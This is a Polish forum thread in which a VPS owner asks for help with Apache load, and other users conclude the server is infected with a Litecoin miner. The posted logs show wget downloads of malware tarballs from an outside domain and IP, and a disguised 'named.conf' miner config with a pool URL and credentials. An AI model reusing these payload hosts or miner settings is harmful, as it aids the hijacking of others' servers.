Skocz do zawartości
murzynnn

Apache (httpd) duże obciążenie serwera

Przez murzynnn, w Administracja Serwerów

Polecane posty

murzynnn    0

murzynnn
Napisano (edytowany)

Witam wszystkich!

 

Posiadam ogromny problem, ponieważ mam zainstalowanego apache na serwerze wirtualnym VPS (z obsługą panelu DirectAdmin), instalowałem wczoraj dodatek "ConfigServer Firewall&Security"

przed brute-force atakami i skonfigurowałem go poprawnie i działa, lecz w pewnym momencie apache zaczął pluć błędami, ogromnie one obciążają serwer (nie wspominając o pliku error.log który się zapycha i waży bardzo dużo), zwiększa się również wykorzystywanie pamięci RAM (dochodzi nawet do wykorzystywania w 100%) oraz powstaje dużo procesów pod komendą "top".

 

Po restartowaniu apache problem znika, lecz po minucie znów zaczyna się zapychać.

 

Proszę o szybką pomoc.

 

 

System zainstalowany to CentOS 6.

 

top:

 PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
3881 apache    20   0 7053m  10m  496 S  9.9  0.2 107:13.76 host
11606 apache    20   0  309m  13m 4088 S  4.3  0.2   0:00.48 httpd
11306 apache    20   0  313m  17m 4092 S  1.7  0.3   0:00.38 httpd
 1422 root      20   0 44048 2940  444 S  1.3  0.0 790:19.76 sc_trans_linux
11516 apache    20   0  324m  28m 4416 S  1.3  0.5   0:00.73 httpd
29032 root      20   0 58292 4648 1012 S  1.0  0.1   0:36.86 lfd
11284 apache    20   0  319m  21m 4708 S  0.7  0.4   0:00.28 httpd
11297 apache    20   0  213m  10m 3432 S  0.7  0.2   0:00.12 httpd
11347 apache    20   0  316m  16m 3936 S  0.7  0.3   0:00.25 httpd
11524 apache    20   0  211m 5856 1184 D  0.7  0.1   0:01.24 httpd
12554 apache    20   0  213m  10m 3492 S  0.7  0.2   0:00.06 httpd
11152 apache    20   0  214m  12m 3964 S  0.3  0.2   0:00.15 httpd
11167 apache    20   0  215m  11m 3516 S  0.3  0.2   0:00.14 httpd
11174 apache    20   0  317m  19m 3812 S  0.3  0.3   0:00.35 httpd
11178 apache    20   0  214m  12m 3992 S  0.3  0.2   0:00.15 httpd
11197 apache    20   0  217m  12m 3672 S  0.3  0.2   0:00.13 httpd
11200 apache    20   0  319m  20m 3756 S  0.3  0.3   0:00.23 httpd

Logi z apache'a error_log

[Wed Dec 04 10:21:22 2013] [warn] Init: Name-based SSL virtual hosts only work for clients with TLS server name indication support (RFC 4366)
[Wed Dec 04 10:21:22 2013] [notice] Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.0-fips DAV/2 PHP/5.3.27 configured -- resuming normal operations
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] script '/var/www/html/index.php' not found or unable to stat, referer: -
[Wed Dec 04 13:56:08 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/404.shtml, referer: -

 

Edytowano przez murzynnn (zobacz historię edycji)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

maniektme    99

maniektme
Napisano (edytowany)

Zastopuj CSF i sprawdź jak wtedy będzie wyglądało obciążenie. Kiedyś miałem podobny problem, bo CSF był niewłaściwie skonfigurowany - zapomniałem skopiować własny config. Poza tym przejrzyj sobie inne logi jak dmesg czy messages no i wpisz polecenie mail - całkiem możliwe, że masz już tonę maili z powiadomieniem o nadmiernym czasie działania demonów odpalonych w systemie.

Poza tym "not found or unable to stat, referer" może oznaczać skopany DocumentRoot w vhoście lub brak plików. A tutaj masz adres 127.0.0.1, czyli jakiś lokalny demon "dobiera się" do Apache. Czy masz odpalone "monitorowanie" Apache w CSF?

Edytowano przez maniektme (zobacz historię edycji)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

murzynnn    0

murzynnn
Napisano (edytowany)

Zastopuj CSF i sprawdź jak wtedy będzie wyglądało obciążenie. Kiedyś miałem podobny problem, bo CSF był niewłaściwie skonfigurowany - zapomniałem skopiować własny config. Poza tym przejrzyj sobie inne logi jak dmesg czy messages no i wpisz polecenie mail - całkiem możliwe, że masz już tonę maili z powiadomieniem o nadmiernym czasie działania demonów odpalonych w systemie.

 

Poza tym "not found or unable to stat, referer" może oznaczać skopany DocumentRoot w vhoście lub brak plików. A tutaj masz adres 127.0.0.1, czyli jakiś lokalny demon "dobiera się" do Apache. Czy masz odpalone "monitorowanie" Apache w CSF?

 

Dzięki za odpowiedź.

 

Inne logi czyste po za tym error_log wyżej wymienionym, w jaki sposób mogę odpalić monitorowanie w CSF?

Edytowano przez murzynnn (zobacz historię edycji)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

maniektme    99

maniektme
Napisano

W topie widać, że działa Ci demon o nazwie lfd, co wskazuje na to, że masz zainstalowany CSF. Podejrzyj sobie plik konfiguracyjny csf.conf i dostosuj go do swoich potrzeb. Tutaj masz stronę projektu.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

murzynnn    0

murzynnn
Napisano (edytowany)

Jak na razie CSF się uspokoił lecz niepokojący zapis w logach zauważyłem:

[Thu Dec 05 19:27:08 2013] [error] [client 144.76.199.103] File does not exist: /var/www/html/404.shtml
--2013-12-05 20:01:52--  http://shst-support.ru/_____FdsFGDET/md/x64l.tar.gz
Resolving shst-support.ru... 93.174.242.213
Connecting to shst-support.ru|93.174.242.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 205159 (200K) [application/x-gzip]
Saving to: "l.tar.gz"

     0K .......... .......... .......... .......... .......... 24%  601K 0s
    50K .......... .......... .......... .......... .......... 49% 1.15M 0s
   100K .......... .......... .......... .......... .......... 74% 1.19M 0s
   150K .......... .......... .......... .......... .......... 99% 1.23M 0s
   200K                                                       100%  669G=0.2s

2013-12-05 20:01:54 (969 KB/s) - "l.tar.gz" saved [205159/205159]

[Thu Dec 05 20:45:17 2013] [error] [client 127.0.0.1] client denied by server configuration: /var/www/html/server-status
[Thu Dec 05 20:45:17 2013] [error] [client 127.0.0.1] File does not exist: /var/www/html/403.shtml

Co może oznaczać?

 

Również coś znów mi obciążyło procesor w topie mam taką informacje:

 PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
29825 apache    20   0  458m 3148 1128 S 202.7  0.1   1662:44 named

Jak temu zapobiec?

Edytowano przez Gość (zobacz historię edycji)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość patrys   

Gość patrys
Napisano

Należy na początku ustawić sensowne reguły firewall i przejrzeć całe oprogramowanie....

Twój serwer uczestniczy za pewne w jakimś botnecie radośnie coś skanując, polecał bym to szybko ogarnąć zanim napisze Cert Polska czy serwer odłączy serwerownia.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

murzynnn    0

murzynnn
Napisano

W takim razie może ktoś na forum posiada dobrą konfigurację csf.conf (plugin ConfigServer Firewall&Security zintegrowany z Direct Adminem), już mam dość, masakra ciągle ten apache przeciąża procesor. :/

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość patrys   

Gość patrys
Napisano

Sam firewall to dopiero początek, dalej trzeba rozebrać procesy...

 

ps. nie wiem po co ludzie się męczą z takimi wielkimi kombajnami jak CSF.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

murzynnn    0

murzynnn
Napisano (edytowany)

Problem ustąpił z CSF (skonfigurowałem pod DirectAdmina), lecz teraz wywiódł się kolejny właśnie z tym obciążeniem procesora, więc tak w logach httpd (error_log) pokazuje:


[Fri Dec 06 11:13:34 2013] [notice] Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.0-fips DAV/2 PHP/5.3.27 configured -- resuming normal operations

--2013-12-06 11:53:55--  http://64.251.13.154/x64w.tar.gz
Connecting to 64.251.13.154:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 206200 (201K) [application/octet-stream]
Saving to: "l.tar.gz"

     0K .......... .......... .......... .......... .......... 24%  235K 1s
    50K .......... .......... .......... .......... .......... 49%  468K 0s
   100K .......... .......... .......... .......... .......... 74%  469K 0s
   150K .......... .......... .......... .......... .......... 99%  469K 0s
   200K .                                                     100% 2608G=0.5s

2013-12-06 11:53:56 (378 KB/s) - "l.tar.gz" saved [206200/206200]

Pobierając ten plik x64w.tar.gz są w nim następujące pliki:

 

tarPNG_nqxxxxp.PNG

 

i w pliku named.conf jest zawarty następujący kod:

{
        "_comment1" : "Any long-format command line argument ",
        "_comment2" : "may be used in this JSON configuration file",

        "url" : "stratum+tcp://ltc.give-me-coins.com:80",
        "user" : "ltc_cpu_miner.cpu02",
        "pass" : "Tfb67df",

        "algo" : "scrypt",

        "quiet" : true,
        "background" : true
}

Chyba to obciąża mój serwer, jak temu zaradzić? Wydaje mi się, że coś zainfekowało system. Wykorzystywanie procesora dochodzi nawet do 80%.

 

Wyniki z topa

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
18459 apache    20   0  458m 3152 1128 S 194.9  0.1  22:29.17 named
21399 apache    20   0  312m  20m 4208 S  2.0  0.3   0:00.08 httpd
 2036 root      20   0 28692 4540  596 S  1.3  0.1  39:45.53 sc_trans_linux
21467 apache    20   0  312m  20m 4224 S  1.3  0.3   0:00.09 httpd
  760 mysql     20   0 2346m 208m 5044 S  1.0  3.4  52:07.74 mysqld
21386 apache    20   0  338m  45m 5100 S  1.0  0.7   0:00.47 httpd
21460 apache    20   0  214m  16m 3956 S  1.0  0.3   0:00.04 httpd
21480 apache    20   0  217m  19m 4068 S  1.0  0.3   0:00.07 httpd
21468 apache    20   0  215m  18m 3996 S  0.7  0.3   0:00.05 httpd
21470 apache    20   0  215m  17m 4004 S  0.7  0.3   0:00.03 httpd
21479 apache    20   0  216m  16m 4412 S  0.7  0.3   0:00.02 httpd
22462 apache    20   0 3051m 3580  924 S  0.7  0.1   3:27.90 host

Proszę o pomoc. :(

 

Edytowano przez murzynnn (zobacz historię edycji)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość patrys   

Gość patrys
Napisano

Ktoś generuje Litecoiny ;)

Popularne ostatnio jest infekowanie dziurawych serwerów i cpuminer ...

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

murzynnn    0

murzynnn
Napisano

Ktoś generuje Litecoiny ;)

Popularne ostatnio jest infekowanie dziurawych serwerów i cpuminer ...

 

A więc jak mogę to zabezpieczyć?

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Miłosz    2311

Miłosz
Napisano

Ostatnio miałem przypadek u Klienta gdzie pewien "admin" zaaplikował śmiecia do crona, który pobierał strone, na której zawartość była kolejnym skryptem. No i ten skrypcik podmieniał /bin/bash z odpowiednimi modyfikacjami. No a potem to już leciała kopalnia na 8x 100% :D

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość patrys   

Gość patrys
Napisano

Skąd mamy wiedzieć co tam się dzieje ?

Tak jak pisałem wcześniej trzeba przejrzeć wszystko...

 

Coś podobnego ostatnio znalazłem na serwerze pewnej dużej spółki akcyjnej.

Tak właśnie się kończy cięcie kosztów na administratorach w firmie ;)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

www.mzone.uk    1200

www.mzone.uk
Napisano

 

 

A więc co mi poradzicie? Muszę ten problem rozwiązać, nie mogę tego tak zostawić. :/

Poszukaj poważnego administratora, który Ci ogarnie serwer, unikaj takich z PW za 10 złotych.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się
Przejdź do listy tematów Administracja Serwerów
×